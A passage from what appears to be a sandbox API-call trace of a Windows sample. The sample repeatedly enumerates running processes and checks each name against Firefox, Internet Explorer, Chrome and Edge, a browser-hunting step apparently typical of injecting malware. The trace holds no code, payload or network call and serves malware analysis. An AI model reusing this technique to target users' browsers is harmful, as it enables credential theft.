dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0210.443] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0210.443] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0210.443] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0210.443] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0210.443] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0210.444] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0210.444] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0210.444] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0210.444] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0210.444] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0210.444] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0210.444] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0210.444] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0210.444] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0210.444] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="gtjtdfe")) returned 1 [0210.445] lstrcmpiA (lpString1="gtjtdfe", lpString2="firefox.exe") returned 1 [0210.445] lstrcmpiA (lpString1="gtjtdfe", lpString2="iexplore.exe") returned -1 [0210.445] lstrcmpiA (lpString1="gtjtdfe", lpString2="chrome.exe") returned 1 [0210.445] lstrcmpiA (lpString1="gtjtdfe", lpString2="microsoftedgecp.exe") returned -1 [0210.445] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="gtjtdfe")) returned 0 [0210.445] CloseHandle (hObject=0xd4) returned 1 [0210.445] Sleep (dwMilliseconds=0x3e8) [0211.502] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xd4 [0211.504] Process32First (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0211.505] lstrcmpiA (lpString1="[System Process]", lpString2="firefox.exe") returned -1 [0211.505] lstrcmpiA (lpString1="[System Process]", lpString2="iexplore.exe") returned -1 [0211.505] lstrcmpiA (lpString1="[System Process]", lpString2="chrome.exe") returned -1 [0211.505] lstrcmpiA (lpString1="[System Process]", lpString2="microsoftedgecp.exe") returned -1 [0211.505] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0211.505] lstrcmpiA (lpString1="System", lpString2="firefox.exe") returned 1 [0211.505] lstrcmpiA (lpString1="System", lpString2="iexplore.exe") returned 1 [0211.505] lstrcmpiA (lpString1="System", lpString2="chrome.exe") returned 1 [0211.505] lstrcmpiA (lpString1="System", lpString2="microsoftedgecp.exe") returned 1 [0211.505] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0211.506] lstrcmpiA (lpString1="smss.exe", lpString2="firefox.exe") returned 1 [0211.506] lstrcmpiA (lpString1="smss.exe", lpString2="iexplore.exe") returned 1 [0211.506] lstrcmpiA (lpString1="smss.exe", lpString2="chrome.exe") returned 1 [0211.506] lstrcmpiA (lpString1="smss.exe", lpString2="microsoftedgecp.exe") returned 1 [0211.506] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0211.506] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0211.506] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0211.506] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0211.507] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0211.507] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0211.507] lstrcmpiA (lpString1="wininit.exe", lpString2="firefox.exe") returned 1 [0211.507] lstrcmpiA (lpString1="wininit.exe", lpString2="iexplore.exe") returned 1 [0211.507] lstrcmpiA (lpString1="wininit.exe", lpString2="chrome.exe") returned 1 [0211.507] lstrcmpiA (lpString1="wininit.exe", lpString2="microsoftedgecp.exe") returned 1 [0211.507] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0211.508] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0211.508] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0211.508] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0211.508] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0211.508] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0211.508] lstrcmpiA (lpString1="winlogon.exe", lpString2="firefox.exe") returned 1 [0211.508] lstrcmpiA (lpString1="winlogon.exe", lpString2="iexplore.exe") returned 1 [0211.508] lstrcmpiA (lpString1="winlogon.exe", lpString2="chrome.exe") returned 1 [0211.508] lstrcmpiA (lpString1="winlogon.exe", lpString2="microsoftedgecp.exe") returned 1 [0211.508] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0211.509] lstrcmpiA (lpString1="services.exe", lpString2="firefox.exe") returned 1 [0211.509] lstrcmpiA (lpString1="services.exe", lpString2="iexplore.exe") returned 1 [0211.509] lstrcmpiA (lpString1="services.exe", lpString2="chrome.exe") returned 1 [0211.509] lstrcmpiA (lpString1="services.exe", lpString2="microsoftedgecp.exe") returned 1 [0211.509] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0211.509] lstrcmpiA (lpString1="lsass.exe", lpString2="firefox.exe") returned 1 [0211.509] lstrcmpiA (lpString1="lsass.exe", lpString2="iexplore.exe") returned 1 [0211.509] lstrcmpiA (lpString1="lsass.exe", lpString2="chrome.exe") returned 1 [0211.509] lstrcmpiA (lpString1="lsass.exe", lpString2="microsoftedgecp.exe") returned -1 [0211.509] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0211.510] lstrcmpiA (lpString1="lsm.exe", lpString2="firefox.exe") returned 1 [0211.510] lstrcmpiA (lpString1="lsm.exe", lpString2="iexplore.exe") returned 1 [0211.510] lstrcmpiA (lpString1="lsm.exe", lpString2="chrome.exe") returned 1 [0211.510] lstrcmpiA (lpString1="lsm.exe", lpString2="microsoftedgecp.exe") returned -1 [0211.510] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0211.510] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0211.510] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0211.510] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0211.510] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0211.511] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0211.511] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0211.511] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0211.511] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0211.511] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0211.511] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0211.512] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0211.512] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0211.512] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0211.512] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0211.512] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0211.512] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0211.512] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0211.512] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0211.512] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0211.512] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0211.513] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0211.513] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0211.513] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0211.513] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0211.513] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0211.513] lstrcmpiA (lpString1="audiodg.exe", lpString2="firefox.exe") returned -1 [0211.513] lstrcmpiA (lpString1="audiodg.exe", lpString2="iexplore.exe") returned -1 [0211.513] lstrcmpiA (lpString1="audiodg.exe", lpString2="chrome.exe") returned -1 [0211.513] lstrcmpiA (lpString1="audiodg.exe", lpString2="microsoftedgecp.exe") returned -1 [0211.513] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0211.514] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0211.514] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0211.514] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0211.514] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0211.514] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0211.514] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0211.514] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0211.514] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0211.515] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0211.515] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0211.515] lstrcmpiA (lpString1="dwm.exe", lpString2="firefox.exe") returned -1 [0211.515] lstrcmpiA (lpString1="dwm.exe", lpString2="iexplore.exe") returned -1 [0211.515] lstrcmpiA (lpString1="dwm.exe", lpString2="chrome.exe") returned 1 [0211.515] lstrcmpiA (lpString1="dwm.exe", lpString2="microsoftedgecp.exe") returned -1 [0211.515] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0211.516] lstrcmpiA (lpString1="spoolsv.exe", lpString2="firefox.exe") returned 1 [0211.516] lstrcmpiA (lpString1="spoolsv.exe", lpString2="iexplore.exe") returned 1 [0211.516] lstrcmpiA (lpString1="spoolsv.exe", lpString2="chrome.exe") returned 1 [0211.516] lstrcmpiA (lpString1="spoolsv.exe", lpString2="microsoftedgecp.exe") returned 1 [0211.516] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0211.516] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0211.516] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0211.516] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0211.516] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0211.516] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0211.517] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0211.517] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0211.517] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0211.517] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0211.517] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0211.517] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0211.517] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0211.517] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0211.517] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0211.517] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0211.518] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="firefox.exe") returned -1 [0211.518] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="iexplore.exe") returned -1 [0211.518] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="chrome.exe") returned -1 [0211.518] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="microsoftedgecp.exe") returned -1 [0211.518] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0211.518] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="firefox.exe") returned -1 [0211.518] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="iexplore.exe") returned -1 [0211.518] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="chrome.exe") returned -1 [0211.518] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="microsoftedgecp.exe") returned -1 [0211.518] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0211.519] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="firefox.exe") returned 1 [0211.519] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="iexplore.exe") returned 1 [0211.519] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="chrome.exe") returned 1 [0211.519] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="microsoftedgecp.exe") returned 1 [0211.519] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0211.519] lstrcmpiA (lpString1="definitely.exe", lpString2="firefox.exe") returned -1 [0211.520] lstrcmpiA (lpString1="definitely.exe", lpString2="iexplore.exe") returned -1 [0211.520] lstrcmpiA (lpString1="definitely.exe", lpString2="chrome.exe") returned 1 [0211.520] lstrcmpiA (lpString1="definitely.exe", lpString2="microsoftedgecp.exe") returned -1 [0211.520] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0211.520] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="firefox.exe") returned 1 [0211.520] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="iexplore.exe") returned 1 [0211.520] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="chrome.exe") returned 1 [0211.520] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="microsoftedgecp.exe") returned -1 [0211.520] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0211.521] lstrcmpiA (lpString1="whenever.exe", lpString2="firefox.exe") returned 1 [0211.521] lstrcmpiA (lpString1="whenever.exe", lpString2="iexplore.exe") returned 1 [0211.521] lstrcmpiA (lpString1="whenever.exe", lpString2="chrome.exe") returned 1 [0211.521] lstrcmpiA (lpString1="whenever.exe", lpString2="microsoftedgecp.exe") returned 1 [0211.521] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0211.521] lstrcmpiA (lpString1="potentially.exe", lpString2="firefox.exe") returned 1 [0211.521] lstrcmpiA (lpString1="potentially.exe", lpString2="iexplore.exe") returned 1 [0211.521] lstrcmpiA (lpString1="potentially.exe", lpString2="chrome.exe") returned 1 [0211.521] lstrcmpiA (lpString1="potentially.exe", lpString2="microsoftedgecp.exe") returned 1 [0211.521] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0211.522] lstrcmpiA (lpString1="seeker.exe", lpString2="firefox.exe") returned 1 [0211.522] lstrcmpiA (lpString1="seeker.exe", lpString2="iexplore.exe") returned 1 [0211.522] lstrcmpiA (lpString1="seeker.exe", lpString2="chrome.exe") returned 1 [0211.522] lstrcmpiA (lpString1="seeker.exe", lpString2="microsoftedgecp.exe") returned 1 [0211.522] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0211.522] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="firefox.exe") returned 1 [0211.522] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="iexplore.exe") returned 1 [0211.522] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="chrome.exe") returned 1 [0211.522] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="microsoftedgecp.exe") returned 1 [0211.522] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0211.523] lstrcmpiA (lpString1="birth bean.exe", lpString2="firefox.exe") returned -1 [0211.523] lstrcmpiA (lpString1="birth bean.exe", lpString2="iexplore.exe") returned -1 [0211.523] lstrcmpiA (lpString1="birth bean.exe", lpString2="chrome.exe") returned -1 [0211.523] lstrcmpiA (lpString1="birth bean.exe", lpString2="microsoftedgecp.exe") returned -1 [0211.523] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0211.523] lstrcmpiA (lpString1="ruby.exe", lpString2="firefox.exe") returned 1 [0211.523] lstrcmpiA (lpString1="ruby.exe", lpString2="iexplore.exe") returned 1 [0211.523] lstrcmpiA (lpString1="ruby.exe", lpString2="chrome.exe") returned 1 [0211.523] lstrcmpiA (lpString1="ruby.exe", lpString2="microsoftedgecp.exe") returned 1 [0211.523] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0211.524] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="firefox.exe") returned 1 [0211.524] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="iexplore.exe") returned 1 [0211.524] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="chrome.exe") returned 1 [0211.524] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="microsoftedgecp.exe") returned 1 [0211.524] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0211.525] lstrcmpiA (lpString1="smith.exe", lpString2="firefox.exe") returned 1 [0211.525] lstrcmpiA (lpString1="smith.exe", lpString2="iexplore.exe") returned 1 [0211.525] lstrcmpiA (lpString1="smith.exe", lpString2="chrome.exe") returned 1 [0211.525] lstrcmpiA (lpString1="smith.exe", lpString2="microsoftedgecp.exe") returned 1 [0211.525] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0211.525] lstrcmpiA (lpString1="spicedespite.exe", lpString2="firefox.exe") returned 1 